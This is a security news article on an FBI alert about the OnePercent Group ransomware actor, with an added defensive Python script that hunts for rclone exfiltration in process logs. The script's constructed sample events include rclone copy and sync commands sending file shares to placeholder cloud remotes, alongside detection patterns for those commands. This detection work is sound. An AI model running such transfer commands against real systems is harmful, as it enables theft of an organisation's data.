25 August 2021

FBI shares info on “OnePercent Group” ransomware group

The Federal Bureau of Investigation (FBI) has published a flash alert detailing the activities of a cybercriminal group nicknamed “OnePercent Group” that has been conducting ransomware attacks against US organizations since November 2020.

According to the agency, the threat actor gains initial access through phishing emails that deliver the IcedID banking trojan, which in turn downloads additional software, including Cobalt Strike, used to move laterally through the targeted network. The actor's other tooling includes Rclone (used to exfiltrate data to AWS S3 cloud storage), Mimikatz, PowerShell, SharpKatz, BetterSafetyKatz, and SharpSploit.
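The Rclone-to-cloud-storage step above is the one most defenders can hunt for in their own telemetry. The following is an added illustration, not code from the FBI alert or from this article: it scans process-creation events for rclone transfer syntax (a transfer verb such as copy or sync, a remote:path destination, rclone-specific flags), so it still fires when the binary has been renamed. The log lines, host names, remote names and paths are all constructed for the example.

```python
"""Hunt for rclone-style bulk exfiltration in process-creation logs.

Added illustration only. The sample events below are constructed
(Sysmon Event ID 1 style, flattened to one line each); they are not
real victim telemetry and not indicators from the FBI flash alert.
"""
import re
from typing import Optional

SAMPLE_EVENTS = [
    r'host=ws01 user=CORP\jsmith image=C:\Windows\System32\svchost.exe cmdline="svchost.exe -k netsvcs"',
    r'host=fs01 user=CORP\svc_backup image=C:\ProgramData\rc\rclone.exe cmdline="rclone.exe copy \\fs01\finance remote:corp-dump --transfers 32 --no-check-certificate"',
    # rclone renamed to svchost.exe, which is why we match on syntax, not on the file name
    r'host=fs01 user=CORP\svc_backup image=C:\ProgramData\rc\svchost.exe cmdline="svchost.exe sync D:\shares s3:bk-0x1 --config C:\Users\Public\rclone.conf"',
    r'host=ws02 user=CORP\akim image=C:\Program Files\rclone\rclone.exe cmdline="rclone.exe lsd gdrive:"',
]

# rclone verbs that move data off the host in bulk
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# flags distinctive of rclone regardless of what the executable is called
RCLONE_FLAGS = {"--transfers", "--config", "--no-check-certificate",
                "--ignore-existing", "--bwlimit", "--progress", "--checkers"}
# rclone remote syntax is name:path; exclude Windows drive letters (C:\...) and URLs
REMOTE_RE = re.compile(r'^(?!\w:\\)(?!\w+://)([A-Za-z0-9_-]{2,}):\S*$')
# constructed one-line event format used by SAMPLE_EVENTS
EVENT_RE = re.compile(
    r'host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"$'
)


def analyse(event: str) -> Optional[dict]:
    """Return a finding for one event, or None if it does not look like rclone."""
    m = EVENT_RE.match(event)
    if not m:
        return None
    image = m["image"]
    # whitespace split is enough for the constructed samples (no quoted spaces in args)
    argv = m["cmdline"].split()
    if not argv:
        return None
    verb = argv[1].lower() if len(argv) > 1 else ""
    remotes = [a for a in argv[1:] if REMOTE_RE.match(a)]
    flags = {a.split("=")[0].lower() for a in argv if a.startswith("--")} & RCLONE_FLAGS
    named_rclone = image.lower().endswith("rclone.exe") or argv[0].lower() == "rclone.exe"

    # Trigger on the name, on transfer-verb + remote syntax, or on two or more rclone flags
    if not (named_rclone or (verb in TRANSFER_VERBS and remotes) or len(flags) >= 2):
        return None

    reasons = []
    if not named_rclone:
        reasons.append(f"rclone syntax under renamed binary {image}")
    if verb in TRANSFER_VERBS and remotes:
        severity = "high"
        reasons.append(f"bulk transfer '{verb}' to remote {remotes[-1]}")
    else:
        severity = "low"
        reasons.append(f"rclone invocation (verb '{verb}')")
    if "--no-check-certificate" in flags:
        reasons.append("TLS verification disabled")
    if flags:
        reasons.append("rclone flags: " + ", ".join(sorted(flags)))
    return {"host": m["host"], "user": m["user"], "severity": severity, "reasons": reasons}


def hunt(events) -> list:
    """Run analyse() over a batch of events and keep only the hits."""
    return [f for f in (analyse(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['host']} {finding['user']}: "
              + "; ".join(finding["reasons"]))
```

On the constructed sample the two transfer events (one under the real rclone.exe name, one under a renamed copy) come back as high severity, the directory listing against a personal cloud drive as low severity, and the genuine svchost.exe launch is not flagged. In practice the same logic maps onto a SIEM query over the process command-line field; the point is to key on rclone's argument syntax and flags rather than on the file name the actor chose.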

“OnePercent Group actors encrypt the data and exfiltrate it from the victims’ systems. The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency. OnePercent Group actors’ extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data,” the flash alert reads.

“Once the ransomware is successfully deployed, the victim will start to receive phone calls through spoofed phone numbers with ransom demands and are provided a ProtonMail email address for further communication. The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data. When a victim company does not respond, the actors send subsequent threats to publish the victim company’s stolen data via the same ProtonMail email address.”

The FBI notes that OnePercent Group threatens to sell the stolen data to the REvil/Sodinokibi ransomware group if the ransom is not paid, but gives no further detail on the relationship between the two groups. Cybersecurity researchers believe OnePercent Group is likely a REvil affiliate.

The US federal law enforcement agency has also shared indicators of compromise, tactics, techniques, and procedures (TTPs), and mitigation measures to help organizations defend against such attacks.
